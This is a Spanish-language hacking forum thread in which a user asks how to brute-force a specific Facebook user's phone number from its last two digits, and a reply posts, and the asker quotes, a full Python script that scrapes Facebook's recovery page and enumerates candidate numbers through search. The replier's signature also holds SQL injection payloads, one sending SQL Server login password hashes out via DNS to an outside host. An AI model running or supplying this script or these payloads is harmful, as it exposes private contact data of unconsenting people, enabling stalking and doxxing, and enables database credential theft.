Es posible realizar facebook phone number brute force

  • 2 Respuestas
  • 2290 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado lug

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
Buenas compañeros del foro, tengo la duda si aún es posible realizar el brute forcing de numeros celulares para vincularlos a una cuenta de facebook.

Tengo un usuario de facebook del que quiero saber el numero de telefono celular, gracias a las opciones de restablecimiento de contraseña conozco los 2 ultimos digitos del telefono, entonces quiero hacer un ataque de fuerza bruta para sacar el numero.

Facebook en esta URL: You are not allowed to view links. Register or Login nos muestra a que perfil está vinculado un nombre de usuario o telefono, quiero hacer fuerza bruta concatenando los posibles prefijos de mi pais + 5 digitos que desconozco + los 2 ultimos que conozco.

Buscando encontré este script: You are not allowed to view links. Register or Login el cual no funciona ya, no sé si porque facebook implementó alguna protección o porque el diseño de la web cambió y según veo el script parsea el html para encontrar donde insertar los 2 ultimos numeros.

Alguien sabe si este tipo de ataque aún es viable en facebook ? conocen algún otro script para realizar esto ?


Gracais y un saludo.

Desconectado 'or '1'=1

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 2
  • 1;if+not(select+s_user)+<>'sa'+waitfor+delay+'1'--
  • Skype: :)
    • Ver Perfil
    • Email
Código: Python
  1. import urllib2
  2. import re
  3. import threading
  4. import sys
  5.  
  6.  
  7. manual_cookie = raw_input("Get Cookie From https://m.facebook.com/login/identify?ctx=recover After Submitting Your Target: ");
  8. user = raw_input("Username: ")
  9. a = urllib2.build_opener()
  10. a.addheaders.append(('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'))
  11. a.addheaders.append(('Cookie',manual_cookie))
  12. cop = a.open("http://m.facebook.com/login/identify?ctx=recover","ctx=recover&email="+user).read()
  13. lasttwonumbers = re.findall('<ul style="margin:0px"><li>(.*?)</li></ul>',cop)
  14. print "Last 2 #s of Target's Phone: "+lasttwonumbers[0][-2:]
  15.  
  16. cc = raw_input("Country Code: ")
  17. nb_bt = raw_input("#s Between Country Code & Last 2 #s: ")
  18.  
  19. file_save = open('out.txt','a')
  20. opener = urllib2.build_opener()
  21. url = 'http://www.facebook.com/search/more?q=%2B'
  22. zeroz = 0
  23. manual_cookie = raw_input("Logged in Full Facebook Cookie: ")
  24. print "<ul class="bbc_list"><li type="square"> Threads are Set To Default To 5\n</li><li type="square"> Bruting Started"[/li][/list]
  25.  
  26.  
  27. def brute(manual_cookie,number):
  28.    page = url + number
  29.    opener.addheaders.append(('Cookie', manual_cookie))
  30.    get = opener.open(page)
  31.    html = get.read()
  32.    acc = re.findall('<div class="_zs fwb" data-bt="&#123;&quot;ct&quot;:&quot;title&quot;&#125;"><a .*>(.*)<span class="_138">.*</span></a><span class="_5dgp">.*</span></div>', html)
  33.    accc = re.findall('<div class="_zs fwb" data-bt="&#123;&quot;ct&quot;:&quot;title&quot;&#125;"><a .*>(.*)</a><span class="_5dgp">.*</span></div>', html)
  34.    if acc:
  35.       if re.findall(user, html):
  36.          print "\nTarget's Mobile #:\n</li><li type="square"> " + acc[0] + " => +" + str(number) + "\n"[/li][/list]
  37.          file_save.write("\nTarget's Mobile #:\n</li><li type="square"> " + acc[0] + " => +" + str(number) + "\n\n\n")         [/li][/list]
  38.          print "Good Luck"
  39.          sys.exit()
  40.       else:
  41.          print "</li><li type="square"> " + acc[0] + " => +" + str(number)[/li][/list]
  42.          file_save.write("</li><li type="square"> " + acc[0] + " => +" + str(number) + "\n")[/li][/list]
  43.    elif accc:
  44.       if re.findall(user, html):
  45.          print "\nTarget's Mobile #:\n</li><li type="square"> " + accc[0] + " => +" + str(number) + "\n"[/li][/list]
  46.          file_save.write("\nTarget's Mobile #:\n</li><li type="square"> " + accc[0] + " => +" + str(number) + "\n\n\n")         [/li][/list]
  47.          print "Good Luck"
  48.          sys.exit()
  49.       else:
  50.          print "</li><li type="square"> " + accc[0] + " => +" + str(number)[/li][/list]
  51.          file_save.write("</li><li type="square"> " + accc[0] + " => +" + str(number) + "\n")[/li][/list]
  52.  
  53.    else:
  54.       print "[-] => +" + str(number)
  55.      
  56.    
  57. while int(len(str(zeroz))) < int(nb_bt)+1:
  58.    number = str(cc)+str('%0*d' % (int(nb_bt), zeroz))+str(lasttwonumbers[0][-2:])
  59.    t=threading.Thread(target=brute,args=(manual_cookie,number,))
  60.    number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+1))+str(lasttwonumbers[0][-2:])
  61.    to=threading.Thread(target=brute,args=(manual_cookie,number,))
  62.    number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+2))+str(lasttwonumbers[0][-2:])
  63.    tt=threading.Thread(target=brute,args=(manual_cookie,number,))
  64.    number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+3))+str(lasttwonumbers[0][-2:])
  65.    tth=threading.Thread(target=brute,args=(manual_cookie,number,))
  66.    number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+4))+str(lasttwonumbers[0][-2:])
  67.    tf=threading.Thread(target=brute,args=(manual_cookie,number,))
  68.    t.start()
  69.    to.start()
  70.    tt.start()
  71.    tth.start()
  72.    tf.start()
  73.    t.join()
  74.    to.join()
  75.    tt.join()
  76.    tth.join()
  77.    tf.join()
  78.    zeroz += 5
  79.    while 1:
  80.       break
  81.  
  82.  
  83. file_save.close()

Start studying the code and try ... "upgrade the wheel" and not create something from scratch... You use the script correctly? ,  put the manual cookie properly? .. .

bye
1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

Desconectado lug

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
You are not allowed to view links. Register or Login
Código: Python
  1. import urllib2
  2. import re
  3. import threading
  4. import sys
  5.  
  6.  
  7. manual_cookie = raw_input("Get Cookie From https://m.facebook.com/login/identify?ctx=recover After Submitting Your Target: ");
  8. user = raw_input("Username: ")
  9. a = urllib2.build_opener()
  10. a.addheaders.append(('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'))
  11. a.addheaders.append(('Cookie',manual_cookie))
  12. cop = a.open("http://m.facebook.com/login/identify?ctx=recover","ctx=recover&email="+user).read()
  13. lasttwonumbers = re.findall('<ul style="margin:0px"><li>(.*?)</li></ul>',cop)
  14. print "Last 2 #s of Target's Phone: "+lasttwonumbers[0][-2:]
  15.  
  16. cc = raw_input("Country Code: ")
  17. nb_bt = raw_input("#s Between Country Code & Last 2 #s: ")
  18.  
  19. file_save = open('out.txt','a')
  20. opener = urllib2.build_opener()
  21. url = 'http://www.facebook.com/search/more?q=%2B'
  22. zeroz = 0
  23. manual_cookie = raw_input("Logged in Full Facebook Cookie: ")
  24. print "<ul class="bbc_list"><li type="square"> Threads are Set To Default To 5\n</li><li type="square"> Bruting Started"[/li][/list]
  25.  
  26.  
  27. def brute(manual_cookie,number):
  28.    page = url + number
  29.    opener.addheaders.append(('Cookie', manual_cookie))
  30.    get = opener.open(page)
  31.    html = get.read()
  32.    acc = re.findall('<div class="_zs fwb" data-bt="&#123;&quot;ct&quot;:&quot;title&quot;&#125;"><a .*>(.*)<span class="_138">.*</span></a><span class="_5dgp">.*</span></div>', html)
  33.    accc = re.findall('<div class="_zs fwb" data-bt="&#123;&quot;ct&quot;:&quot;title&quot;&#125;"><a .*>(.*)</a><span class="_5dgp">.*</span></div>', html)
  34.    if acc:
  35.       if re.findall(user, html):
  36.          print "\nTarget's Mobile #:\n</li><li type="square"> " + acc[0] + " => +" + str(number) + "\n"[/li][/list]
  37.          file_save.write("\nTarget's Mobile #:\n</li><li type="square"> " + acc[0] + " => +" + str(number) + "\n\n\n")         [/li][/list]
  38.          print "Good Luck"
  39.          sys.exit()
  40.       else:
  41.          print "</li><li type="square"> " + acc[0] + " => +" + str(number)[/li][/list]
  42.          file_save.write("</li><li type="square"> " + acc[0] + " => +" + str(number) + "\n")[/li][/list]
  43.    elif accc:
  44.       if re.findall(user, html):
  45.          print "\nTarget's Mobile #:\n</li><li type="square"> " + accc[0] + " => +" + str(number) + "\n"[/li][/list]
  46.          file_save.write("\nTarget's Mobile #:\n</li><li type="square"> " + accc[0] + " => +" + str(number) + "\n\n\n")         [/li][/list]
  47.          print "Good Luck"
  48.          sys.exit()
  49.       else:
  50.          print "</li><li type="square"> " + accc[0] + " => +" + str(number)[/li][/list]
  51.          file_save.write("</li><li type="square"> " + accc[0] + " => +" + str(number) + "\n")[/li][/list]
  52.  
  53.    else:
  54.       print "[-] => +" + str(number)
  55.      
  56.    
  57. while int(len(str(zeroz))) < int(nb_bt)+1:
  58.    number = str(cc)+str('%0*d' % (int(nb_bt), zeroz))+str(lasttwonumbers[0][-2:])
  59.    t=threading.Thread(target=brute,args=(manual_cookie,number,))
  60.    number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+1))+str(lasttwonumbers[0][-2:])
  61.    to=threading.Thread(target=brute,args=(manual_cookie,number,))
  62.    number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+2))+str(lasttwonumbers[0][-2:])
  63.    tt=threading.Thread(target=brute,args=(manual_cookie,number,))
  64.    number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+3))+str(lasttwonumbers[0][-2:])
  65.    tth=threading.Thread(target=brute,args=(manual_cookie,number,))
  66.    number = str(cc)+str('%0*d' % (int(nb_bt), zeroz+4))+str(lasttwonumbers[0][-2:])
  67.    tf=threading.Thread(target=brute,args=(manual_cookie,number,))
  68.    t.start()
  69.    to.start()
  70.    tt.start()
  71.    tth.start()
  72.    tf.start()
  73.    t.join()
  74.    to.join()
  75.    tt.join()
  76.    tth.join()
  77.    tf.join()
  78.    zeroz += 5
  79.    while 1:
  80.       break
  81.  
  82.  
  83. file_save.close()

Start studying the code and try ... "upgrade the wheel" and not create something from scratch... You use the script correctly? ,  put the manual cookie properly? .. .

bye
Gracias por la respuesta, el asunto es que facebook manda varias peticiones al insertar el usuario y no sé cual de esas multiples cookies que se generan se debe usar.
Por otro lado el script tira error porque intenta parsear del codigo fuente de la web de respuesta creo los 2 ultimos digitos, como el diseño de esta pagina de respuesta no es el mismo al momento de crear el script falla.

De todas formas gracias por la respuesta, intentaré basarme en este codigo para intentar crearme uno propio, aunque queria saber si alguien habia usado este tipo de ataque, si aún es factible o facebook tienen algún sistema para bloquear este tipo de fuerza bruta al numero.

 

Crear extensión para google chrome - envío masivo de mensajes FACEBOOK

Iniciado por tyrell_wellick

Respuestas: 2
Vistas: 2455
Último mensaje Febrero 09, 2018, 10:28:19 am
por lunix.bo
[SOLUCIONADO] Necesito saber algún método para hackear facebook.

Iniciado por Skr01llZ

Respuestas: 4
Vistas: 3816
Último mensaje Agosto 28, 2016, 10:21:42 am
por Stiuvert
[SOLUCIONADO] ¿Hay alguna forma de vulnerar Facebook de manera remota?

Iniciado por zebyper

Respuestas: 1
Vistas: 133
Último mensaje Agosto 13, 2020, 06:36:09 pm
por WHK
[SOLUCIONADO] ¿Podemos saber con qué email se registro un perfil de Facebook?

Iniciado por fluzzz

Respuestas: 2
Vistas: 1479
Último mensaje Octubre 25, 2018, 07:34:58 pm
por fluzzz
[SOLUCIONADO] Es buena idea crearme una cuenta de facebook a través de Tor?

Iniciado por DaWrench

Respuestas: 4
Vistas: 389
Último mensaje Septiembre 15, 2020, 12:22:37 am
por AXCESS